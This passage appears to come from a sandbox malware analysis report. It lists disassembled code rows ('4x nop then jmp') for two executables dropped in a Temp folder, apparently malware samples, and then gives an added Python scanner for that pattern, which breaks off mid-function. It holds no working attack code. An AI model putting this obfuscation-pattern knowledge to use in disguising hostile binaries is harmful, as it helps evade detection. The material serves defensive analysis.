Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DF5CCAh; Function: 10_2_05DF5C20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFDE68h; Function: 10_2_05DFDBC0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFDA10h; Function: 10_2_05DFD768
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05DFFCD0h; Function: 10_2_05DFFA28
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E751ADh; Function: 10_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E75B37h; Function: 10_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E73840h; Function: 10_2_05E73598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h; Function: 10_2_05E744D1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E70740h; Function: 10_2_05E70498
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E726E0h; Function: 10_2_05E72438
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then mov esp, ebp; Function: 10_2_05E787C0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E719D8h; Function: 10_2_05E71730
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E7144Ah; Function: 10_2_05E711A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E733E8h; Function: 10_2_05E73140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E702E8h; Function: 10_2_05E70040
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E70FF0h; Function: 10_2_05E70D48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E72F90h; Function: 10_2_05E72CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E72288h; Function: 10_2_05E71FE0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E740F0h; Function: 10_2_05E73E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E73C98h; Function: 10_2_05E739F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E70B98h; Function: 10_2_05E708F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E72B38h; Function: 10_2_05E72890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then jmp 05E71E30h; Function: 10_2_05E71B88
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then mov ecx, dword ptr [ebp-38h]; Function: 10_2_06181684
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe; Code function: 4x nop then mov ecx, dword ptr [ebp-38h]; Function: 10_2_061852E0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 022BF9C0h; Function: 12_2_022BFA0F
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 022BF9C0h; Function: 12_2_022BFA81
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 022BF9C0h; Function: 12_2_022BF820
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 061C2D5Ch; Function: 12_2_061C2AA8
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 061C3326h; Function: 12_2_061C2F08
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 061CD09Ch; Function: 12_2_061CCDF0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 061C3326h; Function: 12_2_061C3254
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 061CD4F4h; Function: 12_2_061CD248
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h; Function: 12_2_061C0676
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe; Code function: 4x nop then jmp 061CD94Ch; Function: 12_2_061CD6A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CDDA4h12_2_061CDAF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C0D10h12_2_061C0B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C16FBh12_2_061C0B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CE1FCh12_2_061CDF50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CE654h12_2_061CE3A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CEAACh12_2_061CE800
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CEF04h12_2_061CEC58
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_061C0856
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_061C0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CF35Ch12_2_061CF0B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CF7B4h12_2_061CF508
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CFC0Ch12_2_061CF960
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B96F3h12_2_063B9420
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B8320h12_2_063B7FE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B62E4h12_2_063B6038
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B9F0Ah12_2_063B9C38
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BCCFAh12_2_063BCA28
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BFAEAh12_2_063BF818
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B32B4h12_2_063B3008
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BACD2h12_2_063BAA00
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BBF32h12_2_063BBC60
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B370Ch12_2_063B3460
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B1CFCh12_2_063B1A50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BED22h12_2_063BEA50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B02ECh12_2_063B0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B3B64h12_2_063B38B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B2154h12_2_063B1EA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BB16Ah12_2_063BAE98
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B0744h12_2_063B0498
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B673Ch12_2_063B6490
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BDF5Ah12_2_063BDC88
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B712Ch12_2_063B6E80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B4D2Ch12_2_063B4A80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BC3CAh12_2_063BC0F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B0B9Ch12_2_063B08F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B6B96h12_2_063B68E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BF1BAh12_2_063BEEE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B5184h12_2_063B4ED8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B7584h12_2_063B72D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BA3A2h12_2_063BA0D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BD192h12_2_063BCEC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B55DCh12_2_063B5330
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B79DCh12_2_063B7730
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BB602h12_2_063BB330
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BE3F2h12_2_063BE120
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B25ACh12_2_063B2300
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BA83Ah12_2_063BA568
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B2A04h12_2_063B2758
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BD62Ah12_2_063BD358
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B0FF4h12_2_063B0D48
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BE88Ah12_2_063BE5B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B2E5Ch12_2_063B2BB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B144Ch12_2_063B11A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BC862h12_2_063BC590
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B7E34h12_2_063B7B88
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B5A34h12_2_063B5788
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BF652h12_2_063BF380
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B18A4h12_2_063B15F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BDAC2h12_2_063BD7F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B5E8Ch12_2_063B5BE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BBA9Ah12_2_063BB7C8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0641F841
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0641F888
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0641FBA1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06425323h12_2_06425028
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642F5BBh12_2_0642F2C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642D43Bh12_2_0642D140
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06420312h12_2_06420040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06426643h12_2_06426348
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06424322h12_2_06424050
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642914Bh12_2_06428E50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642BC53h12_2_0642B958
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06422C2Ah12_2_06422958
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06421532h12_2_06421260
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642E75Bh12_2_0642E460
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06427963h12_2_06427668
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642A46Bh12_2_0642A170
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642CF73h12_2_0642CC78
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642ADFBh12_2_0642AB00
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642D903h12_2_0642D608
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06426B0Bh12_2_06426810
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06429613h12_2_06429318
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064239F2h12_2_06423720
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642C11Bh12_2_0642BE20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642EC23h12_2_0642E928
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064222FAh12_2_06422028
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06420C02h12_2_06420930
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06427E2Bh12_2_06427B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642A933h12_2_0642A638
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06422792h12_2_064224C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064287BBh12_2_064284C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642109Ah12_2_06420DC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642B2C3h12_2_0642AFC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642DDCBh12_2_0642DAD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06420782h12_2_064204D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06426FD3h12_2_06426CD8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06429ADBh12_2_064297E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064247BAh12_2_064244E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642C5E3h12_2_0642C2E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642F0ECh12_2_0642EDF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064257EBh12_2_064254F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064230C2h12_2_06422DF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064219CAh12_2_064216F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064282F3h12_2_06427FF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642617Bh12_2_06425E80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06424CF3h12_2_06424980
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642355Bh12_2_06423288
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06428C83h12_2_06428988
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642FA83h12_2_0642F788
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06421E62h12_2_06421B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642B78Bh12_2_0642B490
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642E293h12_2_0642DF98
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642749Bh12_2_064271A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06429FA3h12_2_06429CA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642CAABh12_2_0642C7B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06423E8Ah12_2_06423BB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06425CB3h12_2_064259B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06450CCBh12_2_064509D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0645033Bh12_2_06450040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06450803h12_2_06450508
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov ecx, 000003E8h12_2_0648E190
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_06483168
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov ecx, 000003E8h12_2_0648E18E
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0648315A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then push 00000000h12_2_067FF588
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then push 00000000h12_2_067FDFE9
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h18_2_0216E228
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 051B9109h18_2_051B8E58
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 051B9860h18_2_051B9430
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 051B9860h18_2_051B978E
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF508Dh18_2_05DF4D50
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFF780h18_2_05DFF4D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF7750h18_2_05DF74A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF4749h18_2_05DF44A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFEED0h18_2_05DFEC28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFEA78h18_2_05DFE7D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF3A41h18_2_05DF3798
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF6A48h18_2_05DF67A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFE1C8h18_2_05DFDF20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFD918h18_2_05DFD670
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF7BA8h18_2_05DF7900
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFFBD8h18_2_05DFF930
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF4BA1h18_2_05DF48F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFF328h18_2_05DFF080
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF72F8h18_2_05DF7050
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF42F1h18_2_05DF4048
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF6EA0h18_2_05DF6BF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF3E99h18_2_05DF3BF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF65F0h18_2_05DF6348
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFE620h18_2_05DFE378
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5BD2h18_2_05DF5B28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5BD2h18_2_05DF5AD7
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFDD70h18_2_05DFDAC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E751ADh18_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E75B37h18_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E73840h18_2_05E73598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h18_2_05E744D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70740h18_2_05E70498
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E726E0h18_2_05E72438
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov esp, ebp18_2_05E787C9
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E719D8h18_2_05E71730
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E7144Ah18_2_05E711A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E733E8h18_2_05E73140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E702E8h18_2_05E70040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70FF0h18_2_05E70D48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72F90h18_2_05E72CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72288h18_2_05E71FE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E740F0h18_2_05E73E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E73C98h18_2_05E739F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70B98h18_2_05E708F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72B38h18_2_05E72890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E71E30h18_2_05E71B88
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]18_2_061856B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]18_2_061856E8
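Each row above records a run of four nop bytes sitting directly in front of a jmp (or another instruction), with the function's start address as the row's last column. The scanner below reproduces that check on raw x86 code: it finds nop runs of at least four bytes followed by a short (EB rel8) or near (E9 rel32) jmp and resolves the target the way the report prints it, next-instruction address plus displacement. It is an added example, not Joe Sandbox code; the byte buffer and its base address are constructed for this example (the base mirrors the report's Native_New-Nova.exe function 05E70040 only so the printed targets look familiar) and are not a dump of the sample.

```python
"""Find the '4x nop then jmp' pattern the rows above report, on raw x86 code.

Added example (not Joe Sandbox code). SAMPLE_CODE is constructed for this
example and laid out at an arbitrary base address; it is not a dump of the
analysed sample.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass

NOP = 0x90        # single-byte nop (multi-byte 0F 1F nops are not handled here)
JMP_SHORT = 0xEB  # jmp rel8
JMP_NEAR = 0xE9   # jmp rel32


@dataclass(frozen=True)
class NopJmpHit:
    nop_at: int     # address of the first nop in the run
    nop_count: int  # length of the run
    jmp_at: int     # address of the jmp opcode
    target: int     # resolved jump target

    def describe(self) -> str:
        # Same wording the report uses, plus where the jmp sits.
        return f"{self.nop_count}x nop then jmp {self.target:08X}h at {self.jmp_at:08X}"


def find_nop_then_jmp(code: bytes, base: int, min_nops: int = 4) -> list[NopJmpHit]:
    """Return every run of >= min_nops nops that is immediately followed by a jmp.

    Target = address of the instruction after the jmp + signed displacement,
    truncated to 32 bits, which is how the '... then jmp XXXXXXXXh' column reads.
    """
    hits: list[NopJmpHit] = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:
            i += 1
        count = i - start
        if count < min_nops or i >= n:
            continue  # short alignment padding, or the buffer ended inside the run
        op = code[i]
        if op == JMP_SHORT and i + 2 <= n:
            rel = struct.unpack_from("<b", code, i + 1)[0]
            target = (base + i + 2 + rel) & 0xFFFFFFFF
            hits.append(NopJmpHit(base + start, count, base + i, target))
        elif op == JMP_NEAR and i + 5 <= n:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            target = (base + i + 5 + rel) & 0xFFFFFFFF
            hits.append(NopJmpHit(base + start, count, base + i, target))
    return hits


# Constructed sample: prologue, a 4-nop run into a near jmp landing at 05E702E8h,
# a 2-nop run (below threshold, must not match), a 5-nop run into a short jmp, ret.
SAMPLE_BASE = 0x05E70040
SAMPLE_CODE = bytes(
    [0x55, 0x8B, 0xEC]                    # push ebp; mov ebp, esp
    + [0x90] * 4                          # 4x nop
    + [0xE9, 0x9C, 0x02, 0x00, 0x00]      # jmp +0x29C  -> 05E702E8h
    + [0x90] * 2                          # 2x nop (ignored)
    + [0xEB, 0x05]                        # jmp short +5
    + [0x90] * 5                          # 5x nop
    + [0xEB, 0x10]                        # jmp short +0x10 -> 05E70067h
    + [0xC3]                              # ret
)


def scan_sample() -> list[str]:
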